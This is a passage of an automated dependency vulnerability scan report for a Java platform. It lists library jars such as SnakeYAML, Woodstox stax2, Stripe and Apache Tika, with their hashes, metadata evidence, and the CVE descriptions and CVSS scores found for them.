Evidence Type Source Name Value Confidence Vendor file name snakeyaml High Vendor jar package name emitter Highest Vendor jar package name parser Highest Vendor jar package name snakeyaml Highest Vendor jar package name yaml Highest Vendor Manifest automatic-module-name org.yaml.snakeyaml Medium Vendor Manifest bundle-symbolicname org.yaml.snakeyaml Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid snakeyaml Highest Vendor pom artifactid snakeyaml Low Vendor pom developer email alexander.maslov@gmail.com Low Vendor pom developer email jordanangold@gmail.com Low Vendor pom developer email public.somov@gmail.com Low Vendor pom developer id asomov Medium Vendor pom developer id Jordan Medium Vendor pom developer id maslovalex Medium Vendor pom developer name Alexander Maslov Medium Vendor pom developer name Andrey Somov Medium Vendor pom developer name Jordan Angold Medium Vendor pom groupid org.yaml Highest Vendor pom name SnakeYAML High Vendor pom url http://www.snakeyaml.org Highest Product file name snakeyaml High Product jar package name emitter Highest Product jar package name parser Highest Product jar package name snakeyaml Highest Product jar package name yaml Highest Product Manifest automatic-module-name org.yaml.snakeyaml Medium Product Manifest Bundle-Name SnakeYAML Medium Product Manifest bundle-symbolicname org.yaml.snakeyaml Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid snakeyaml Highest Product pom developer email alexander.maslov@gmail.com Low Product pom developer email jordanangold@gmail.com Low Product pom developer email public.somov@gmail.com Low Product pom developer id asomov Low Product pom developer id Jordan Low Product pom developer id maslovalex Low Product pom developer name Alexander Maslov Low Product pom developer name Andrey Somov Low Product pom developer name Jordan Angold Low Product pom groupid org.yaml Highest Product pom name SnakeYAML High Product pom url http://www.snakeyaml.org Medium Version file version 1.25 High Version pom version 1.25 Highest
CVE-2022-1471 suppress
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
CVE-2017-18640 suppress
The Alias feature in SnakeYAML before 1.26 allows entity expansion during a load operation, a related issue to CVE-2003-1564. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-25857 suppress
The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38749 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38751 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38752 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-41854 suppress
Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38750 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
stax-ex-1.8.1.jarDescription:
Extensions to JSR-173 StAX API. License:
Eclipse Distribution License - v 1.0: http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/org/jvnet/staxex/stax-ex/1.8.1/stax-ex-1.8.1.jar
MD5: 8fea4418fa80e957e39c174cec08053c
SHA1: 78011e483a21102fb4858f3e8f269a677e50aa23
SHA256: 20522549056e9e50aa35ef0b445a2e47a53d06be0b0a9467d704e2483ffb049a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stax-ex High Vendor jar package name jvnet Highest Vendor jar package name staxex Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname org.jvnet.staxex.stax-ex Medium Vendor Manifest implementation-build-id 1.8.1-acf3f94, 2018-12-27T15:12:49+0000 Low Vendor Manifest implementation-url https://projects.eclipse.org/projects/ee4j/stax-ex Low Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id org.jvnet.staxex Medium Vendor pom artifactid stax-ex Highest Vendor pom artifactid stax-ex Low Vendor pom developer email Roman.Grigoriadi@oracle.com Low Vendor pom developer email Zheng.Jun.Li@oracle.com Low Vendor pom developer id bravehorsie Medium Vendor pom developer id zhengjl Medium Vendor pom developer name Roman Grigoriadi Medium Vendor pom developer name Zheng Jun Li Medium Vendor pom groupid org.jvnet.staxex Highest Vendor pom name Extended StAX API High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Product file name stax-ex High Product jar package name jvnet Highest Product jar package name staxex Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name Extended StAX API Medium Product Manifest bundle-symbolicname org.jvnet.staxex.stax-ex Medium Product Manifest implementation-build-id 1.8.1-acf3f94, 2018-12-27T15:12:49+0000 Low Product Manifest Implementation-Title Extended StAX API High Product Manifest implementation-url https://projects.eclipse.org/projects/ee4j/stax-ex Low Product pom artifactid stax-ex Highest Product pom developer email Roman.Grigoriadi@oracle.com Low Product pom developer email Zheng.Jun.Li@oracle.com Low Product pom developer id bravehorsie Low Product pom developer id zhengjl Low Product pom developer name Roman Grigoriadi Low Product pom developer name Zheng Jun Li Low Product pom groupid org.jvnet.staxex Highest Product pom name Extended StAX API High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Version file version 1.8.1 High Version Manifest Bundle-Version 1.8.1 High Version Manifest Implementation-Version 1.8.1 High Version pom parent-version 1.8.1 Low Version pom version 1.8.1 Highest
stax2-api-4.2.jarDescription:
tax2 API is an extension to basic Stax 1.0 API that adds significant new functionality, such as full-featured bi-direction validation interface and high-performance Typed Access API.
License:
The BSD License: http://www.opensource.org/licenses/bsd-license.php File Path: /var/simplicite/.m2/repository/org/codehaus/woodstox/stax2-api/4.2/stax2-api-4.2.jar
MD5: 5d22fe6dbb276d1fd6dab40c386a4f0a
SHA1: 13c2b30926bca0429c704c4b4ca0b5d0432b69cd
SHA256: badf6081a0bb526fd2c01951dfefad91b6846b6dd0eb0048587e30d1dd334e68
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stax2-api High Vendor jar package name codehaus Highest Vendor jar package name stax2 Highest Vendor jar package name typed Highest Vendor jar package name validation Highest Vendor Manifest automatic-module-name org.codehaus.stax2 Medium Vendor Manifest bundle-docurl http://github.com/FasterXML/stax2-api Low Vendor Manifest bundle-symbolicname stax2-api Medium Vendor Manifest implementation-build-date 2019-03-13 04:03:16+0000 Low Vendor Manifest Implementation-Vendor fasterxml.com High Vendor Manifest Implementation-Vendor-Id org.codehaus.woodstox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor fasterxml.com Low Vendor pom artifactid stax2-api Highest Vendor pom artifactid stax2-api Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id tatu Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid org.codehaus.woodstox Highest Vendor pom name Stax2 API High Vendor pom organization name fasterxml.com High Vendor pom organization url http://fasterxml.com Medium Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url http://github.com/FasterXML/stax2-api Highest Product file name stax2-api High Product jar package name codehaus Highest Product jar package name osgi Highest Product jar package name stax2 Highest Product jar package name typed Highest Product jar package name validation Highest Product Manifest automatic-module-name org.codehaus.stax2 Medium Product Manifest bundle-docurl http://github.com/FasterXML/stax2-api Low Product Manifest Bundle-Name Stax2 API Medium Product Manifest bundle-symbolicname stax2-api Medium Product Manifest implementation-build-date 2019-03-13 04:03:16+0000 Low Product Manifest Implementation-Title Stax2 API High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Stax2 API Medium Product pom artifactid stax2-api Highest Product pom developer email tatu@fasterxml.com Low Product pom developer id tatu Low Product pom developer name Tatu Saloranta Low Product pom groupid org.codehaus.woodstox Highest Product pom name Stax2 API High Product pom organization name fasterxml.com Low Product pom organization url http://fasterxml.com Low Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url http://github.com/FasterXML/stax2-api Medium Version file version 4.2 High Version Manifest Implementation-Version 4.2 High Version pom parent-version 4.2 Low Version pom version 4.2 Highest
CVE-2022-40152 suppress
Those using Woodstox to parse XML data may be vulnerable to Denial of Service attacks (DOS) if DTD support is enabled. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
stringtemplate-3.2.1.jarDescription:
StringTemplate is a java template engine for generating source code,
web pages, emails, or any other formatted text output.
StringTemplate is particularly good at multi-targeted code generators,
multiple site skins, and internationalization/localization.
It evolved over years of effort developing jGuru.com.
StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org
and powers the ANTLR v3 code generator. Its distinguishing characteristic
is that unlike other engines, it strictly enforces model-view separation.
Strict separation makes websites and code generators more flexible
and maintainable; it also provides an excellent defense against malicious
template authors.
There are currently about 600 StringTemplate source downloads a month.
License:
BSD licence: http://antlr.org/license.html File Path: /var/simplicite/.m2/repository/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1.jar
MD5: b58ca53e518a92a1991eb63b61917582
SHA1: 59ec8083721eae215c6f3caee944c410d2be34de
SHA256: f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stringtemplate High Vendor jar package name antlr Highest Vendor jar package name antlr Low Vendor jar package name language Low Vendor jar package name stringtemplate Highest Vendor jar package name stringtemplate Low Vendor pom artifactid stringtemplate Highest Vendor pom artifactid stringtemplate Low Vendor pom developer email jimi@temporal-wave.com Low Vendor pom developer email parrt@antlr.org Low Vendor pom developer name Jim Idle Medium Vendor pom developer name Terence Parr Medium Vendor pom developer org Temporal Wave LLC Medium Vendor pom developer org USFCA Medium Vendor pom developer org URL http://www.cs.usfca.edu Medium Vendor pom developer org URL http://www.temporal-wave.com Medium Vendor pom groupid org.antlr Highest Vendor pom name ANTLR StringTemplate High Vendor pom url http://www.stringtemplate.org Highest Product file name stringtemplate High Product jar package name antlr Highest Product jar package name language Low Product jar package name stringtemplate Highest Product jar package name stringtemplate Low Product pom artifactid stringtemplate Highest Product pom developer email jimi@temporal-wave.com Low Product pom developer email parrt@antlr.org Low Product pom developer name Jim Idle Low Product pom developer name Terence Parr Low Product pom developer org Temporal Wave LLC Low Product pom developer org USFCA Low Product pom developer org URL http://www.cs.usfca.edu Low Product pom developer org URL http://www.temporal-wave.com Low Product pom groupid org.antlr Highest Product pom name ANTLR StringTemplate High Product pom url http://www.stringtemplate.org Medium Version file version 3.2.1 High Version pom version 3.2.1 Highest
stripe-java-12.0.0.jarDescription:
Stripe Java Bindings License:
The MIT License: https://opensource.org/licenses/MIT File Path: /var/simplicite/.m2/repository/com/stripe/stripe-java/12.0.0/stripe-java-12.0.0.jar
MD5: 78c7e3844db994a92b3737de088c720c
SHA1: 126bbc011f3a25472d7180db10f8e24ce8bd9e91
SHA256: ec7353106e0533db0bc52ab7bb9a4cd77e3647765847c6fe97859b9ebc6e2f40
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stripe-java High Vendor jar package name stripe Highest Vendor Manifest bundle-symbolicname stripe-java Medium Vendor Manifest Implementation-Vendor Stripe, Inc. (https://stripe.com) High Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid stripe-java Highest Vendor pom artifactid stripe-java Low Vendor pom developer email support+java@stripe.com Low Vendor pom developer id stripe Medium Vendor pom developer name Stripe Medium Vendor pom groupid com.stripe Highest Vendor pom name stripe-java High Vendor pom organization name Stripe High Vendor pom organization url https://stripe.com Medium Vendor pom url stripe/stripe-java Highest Product file name stripe-java High Product jar package name stripe Highest Product Manifest Bundle-Name stripe-java Medium Product Manifest bundle-symbolicname stripe-java Medium Product Manifest Implementation-Title stripe-java High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid stripe-java Highest Product pom developer email support+java@stripe.com Low Product pom developer id stripe Low Product pom developer name Stripe Low Product pom groupid com.stripe Highest Product pom name stripe-java High Product pom organization name Stripe Low Product pom organization url https://stripe.com Low Product pom url stripe/stripe-java High Version file version 12.0.0 High Version Manifest Bundle-Version 12.0.0 High Version Manifest Implementation-Version 12.0.0 High Version pom version 12.0.0 Highest
sts-2.2.0.jarDescription:
jclouds components to access an implementation of Security Token Service (STS) License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/sts/2.2.0/sts-2.2.0.jar
MD5: c28fdf7b52053995204ab1073eeffa50
SHA1: dc2f27e3cee17446a905dce8474761a43b3d2561
SHA256: 9e939a535b94290309c9a8d9db76735a6e8cf199df4d5f585654adf2777ca0fa
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sts High Vendor jar package name jclouds Highest Vendor jar package name sts Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname sts Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid sts Highest Vendor pom artifactid sts Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds sts api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name sts High Product jar package name jclouds Highest Product jar package name sts Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds sts api Medium Product Manifest bundle-symbolicname sts Medium Product Manifest Implementation-Title jclouds sts api High Product Manifest specification-title jclouds jclouds sts api Medium Product pom artifactid sts Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds sts api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
swagger-annotations-1.5.8.jarLicense:
http://www.apache.org/licenses/LICENSE-2.0.html File Path: /var/simplicite/.m2/repository/io/swagger/swagger-annotations/1.5.8/swagger-annotations-1.5.8.jar
MD5: 57370150b5f709d54e96e50162653b51
SHA1: 48d3002e43bde443f19750ec5670d345e9cd8d62
SHA256: a476592aad2355c20559ba323c08fd1d8bf630aab75a8c8ddde22987d65f2d52
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name swagger-annotations High Vendor jar package name annotations Highest Vendor jar package name io Highest Vendor jar package name swagger Highest Vendor Manifest bundle-symbolicname io.swagger.annotations Medium Vendor Manifest mode development Low Vendor Manifest url https://github.com/swagger-api/swagger-core/modules/swagger-annotations Low Vendor pom artifactid swagger-annotations Highest Vendor pom artifactid swagger-annotations Low Vendor pom groupid io.swagger Highest Vendor pom name swagger-annotations High Vendor pom parent-artifactid swagger-project Low Product file name swagger-annotations High Product jar package name annotations Highest Product jar package name api Highest Product jar package name io Highest Product jar package name swagger Highest Product Manifest Bundle-Name swagger-annotations Medium Product Manifest bundle-symbolicname io.swagger.annotations Medium Product Manifest mode development Low Product Manifest url https://github.com/swagger-api/swagger-core/modules/swagger-annotations Low Product pom artifactid swagger-annotations Highest Product pom groupid io.swagger Highest Product pom name swagger-annotations High Product pom parent-artifactid swagger-project Medium Version file version 1.5.8 High Version Manifest Bundle-Version 1.5.8 High Version Manifest implementation-version 1.5.8 High Version pom version 1.5.8 Highest
tagsoup-1.2.1.jarDescription:
TagSoup is a SAX-compliant parser written in Java that, instead of parsing well-formed or valid XML, parses HTML as it is found in the wild: poor, nasty and brutish, though quite often far from short. TagSoup is designed for people who have to process this stuff using some semblance of a rational application design. By providing a SAX interface, it allows standard XML tools to be applied to even the worst HTML. TagSoup also includes a command-line processor that reads HTML files and can generate either clean HTML or well-formed XML that is a close approximation to XHTML. License:
Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/ccil/cowan/tagsoup/tagsoup/1.2.1/tagsoup-1.2.1.jar
MD5: ae73a52cdcbec10cd61d9ef22fab5936
SHA1: 5584627487e984c03456266d3f8802eb85a9ce97
SHA256: ac97f7b4b1d8e9337edfa0e34044f8d0efe7223f6ad8f3a85d54cc1018ea2e04
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tagsoup High Vendor jar package name ccil Highest Vendor jar package name cowan Highest Vendor jar package name parser Highest Vendor jar package name tagsoup Highest Vendor pom artifactid tagsoup Highest Vendor pom artifactid tagsoup Low Vendor pom developer name John Cowan Medium Vendor pom groupid org.ccil.cowan.tagsoup Highest Vendor pom name TagSoup High Vendor pom url http://home.ccil.org/~cowan/XML/tagsoup/ Highest Product file name tagsoup High Product jar package name ccil Highest Product jar package name cowan Highest Product jar package name parser Highest Product jar package name tagsoup Highest Product pom artifactid tagsoup Highest Product pom developer name John Cowan Low Product pom groupid org.ccil.cowan.tagsoup Highest Product pom name TagSoup High Product pom url http://home.ccil.org/~cowan/XML/tagsoup/ Medium Version file version 1.2.1 High Version Manifest version 1.2.1 Medium Version pom version 1.2.1 Highest
threeten-extra-1.5.0.jarDescription:
Additional functionality that enhances JSR-310 dates and times in Java SE 8 and later License:
BSD 3-clause: https://raw.githubusercontent.com/ThreeTen/threeten-extra/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/org/threeten/threeten-extra/1.5.0/threeten-extra-1.5.0.jar
MD5: 25fcd93381bd0b0d2cf6b99c231e4bb4
SHA1: d6adb54fefe72482ed049f07af31ddf2c287345f
SHA256: e7def554536188fbaf8aac1a0a2f956b039cbbb5696edc3b8336c442c56ae445
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name threeten-extra High Vendor jar package name extra Highest Vendor jar package name threeten Highest Vendor Manifest bundle-docurl https://www.threeten.org Low Vendor Manifest bundle-symbolicname org.threeten.extra Medium Vendor Manifest implementation-url https://www.threeten.org/threeten-extra Low Vendor Manifest Implementation-Vendor ThreeTen.org High Vendor Manifest Implementation-Vendor-Id org.threeten Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor ThreeTen.org Low Vendor pom artifactid threeten-extra Highest Vendor pom artifactid threeten-extra Low Vendor pom developer id jodastephen Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid org.threeten Highest Vendor pom name ThreeTen-Extra High Vendor pom organization name ThreeTen.org High Vendor pom organization url https://www.threeten.org Medium Vendor pom url https://www.threeten.org/threeten-extra Highest Product file name threeten-extra High Product jar package name extra Highest Product jar package name threeten Highest Product Manifest bundle-docurl https://www.threeten.org Low Product Manifest Bundle-Name ThreeTen-Extra Medium Product Manifest bundle-symbolicname org.threeten.extra Medium Product Manifest Implementation-Title ThreeTen-Extra High Product Manifest implementation-url https://www.threeten.org/threeten-extra Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title ThreeTen-Extra Medium Product pom artifactid threeten-extra Highest Product pom developer id jodastephen Low Product pom developer name Stephen Colebourne Low Product pom groupid org.threeten Highest Product pom name ThreeTen-Extra High Product pom organization name ThreeTen.org Low Product pom organization url https://www.threeten.org Low Product pom url https://www.threeten.org/threeten-extra Medium Version file version 1.5.0 High Version Manifest Bundle-Version 1.5.0 High Version Manifest Implementation-Version 1.5.0 High Version pom version 1.5.0 Highest
threetenbp-1.3.3.jarDescription:
Backport of JSR-310 from JDK 8 to JDK 7 and JDK 6. NOT an implementation of the JSR. License:
BSD 3-clause: https://raw.githubusercontent.com/ThreeTen/threetenbp/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/org/threeten/threetenbp/1.3.3/threetenbp-1.3.3.jar
MD5: 6c45c54a06806225d2754b51fbdf088d
SHA1: 3ea31c96676ff12ab56be0b1af6fff61d1a4f1f2
SHA256: 7bbee842b0334f63627556d3c657aab82431f3a207c8dc4dcfc379d7d210a8c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name threetenbp High Vendor jar package name bp Highest Vendor jar package name threeten Highest Vendor Manifest bundle-docurl http://www.threeten.org Low Vendor Manifest bundle-symbolicname org.threeten.bp Medium Vendor Manifest implementation-url https://www.threeten.org/threetenbp Low Vendor Manifest Implementation-Vendor ThreeTen.org High Vendor Manifest Implementation-Vendor-Id org.threeten Medium Vendor Manifest specification-vendor ThreeTen.org Low Vendor pom artifactid threetenbp Highest Vendor pom artifactid threetenbp Low Vendor pom developer id jodastephen Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid org.threeten Highest Vendor pom name ThreeTen backport High Vendor pom organization name ThreeTen.org High Vendor pom organization url http://www.threeten.org Medium Vendor pom url https://www.threeten.org/threetenbp Highest Product file name threetenbp High Product jar package name bp Highest Product jar package name threeten Highest Product Manifest bundle-docurl http://www.threeten.org Low Product Manifest Bundle-Name ThreeTen backport Medium Product Manifest bundle-symbolicname org.threeten.bp Medium Product Manifest Implementation-Title ThreeTen backport High Product Manifest implementation-url https://www.threeten.org/threetenbp Low Product Manifest specification-title ThreeTen backport Medium Product pom artifactid threetenbp Highest Product pom developer id jodastephen Low Product pom developer name Stephen Colebourne Low Product pom groupid org.threeten Highest Product pom name ThreeTen backport High Product pom organization name ThreeTen.org Low Product pom organization url http://www.threeten.org Low Product pom url https://www.threeten.org/threetenbp Medium Version file version 1.3.3 High Version Manifest Bundle-Version 1.3.3 High Version Manifest Implementation-Version 1.3.3 High Version pom version 1.3.3 Highest
tika-core-1.22.jarDescription:
This is the core Apache Tika™ toolkit library from which all other modules inherit functionality. It also
includes the core facades for the Tika API.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/tika/tika-core/1.22/tika-core-1.22.jar
MD5: 078d3798a32e444b3e3425457402dce3
SHA1: b193f1f977e64ff77025a4cecd7997cff344c4bc
SHA256: 81a9e28c9fa9d6b00d1e5d85795403fb773d4c571175487b35b83a8c02599dd7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tika-core High Vendor jar package name apache Highest Vendor jar package name tika Highest Vendor Manifest automatic-module-name org.apache.tika.core Medium Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-docurl http://tika.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.tika.core Medium Vendor Manifest implementation-url http://tika.apache.org/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.tika Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid tika-core Highest Vendor pom artifactid tika-core Low Vendor pom groupid org.apache.tika Highest Vendor pom name Apache Tika core High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url http://www.apache.org Medium Vendor pom parent-artifactid tika-parent Low Vendor pom url http://tika.apache.org/ Highest Product file name tika-core High Product jar package name apache Highest Product jar package name tika Highest Product Manifest automatic-module-name org.apache.tika.core Medium Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-docurl http://tika.apache.org/ Low Product Manifest Bundle-Name Apache Tika core Medium Product Manifest bundle-symbolicname org.apache.tika.core Medium Product Manifest Implementation-Title Apache Tika core High Product Manifest implementation-url http://tika.apache.org/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Tika core Medium Product pom artifactid tika-core Highest Product pom groupid org.apache.tika Highest Product pom name Apache Tika core High Product pom organization name The Apache Software Foundation Low Product pom organization url http://www.apache.org Low Product pom parent-artifactid tika-parent Medium Product pom url http://tika.apache.org/ Medium Version file version 1.22 High Version Manifest Implementation-Version 1.22 High Version pom version 1.22 Highest
CVE-2020-1950 suppress
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-1951 suppress
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-28657 suppress
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-25169 suppress
The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-30126 suppress
In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0 NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-30973 suppress
We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3. NVD-CWE-Other
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
